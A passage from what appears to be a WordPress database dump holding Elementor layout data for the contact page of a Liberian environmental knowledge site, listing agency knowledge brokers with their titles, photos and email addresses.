Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(15996,2419,'_elementor_controls_usage','a:0:{}'),(15997,2419,'organization','Environmental Protection Agency'),(15998,2419,'position','Manager'),(15999,2419,'e-mail','<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>'),(16000,2419,'phone',''),(16004,2419,'_dp_original','2411'),(16005,2419,'_edit_lock','1631260568:43'),(16006,2419,'_edit_last','1'),(16007,2419,'_pods_photo','a:1:{i:0;i:2365;}'),(16009,2420,'_elementor_controls_usage','a:0:{}'),(16010,2420,'organization','Environmental Protection Agency'),(16011,2420,'position','Assistant Manager'),(16012,2420,'e-mail','<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a>'),(16013,2420,'phone',''),(16017,2420,'_dp_original','2419'),(16018,2420,'_edit_lock','1573877037:1'),(16019,2420,'_edit_last','1'),(16020,2420,'_pods_photo','a:1:{i:0;i:2360;}'),(16021,2420,'photo','2360'),(16023,2419,'photo','2365'),(16024,2421,'_elementor_edit_mode','builder'),(16025,2421,'_elementor_template_type','wp-page'),(16026,2421,'_elementor_version','2.7.5'),(16027,2421,'_wp_page_template','default'),(16028,2421,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. 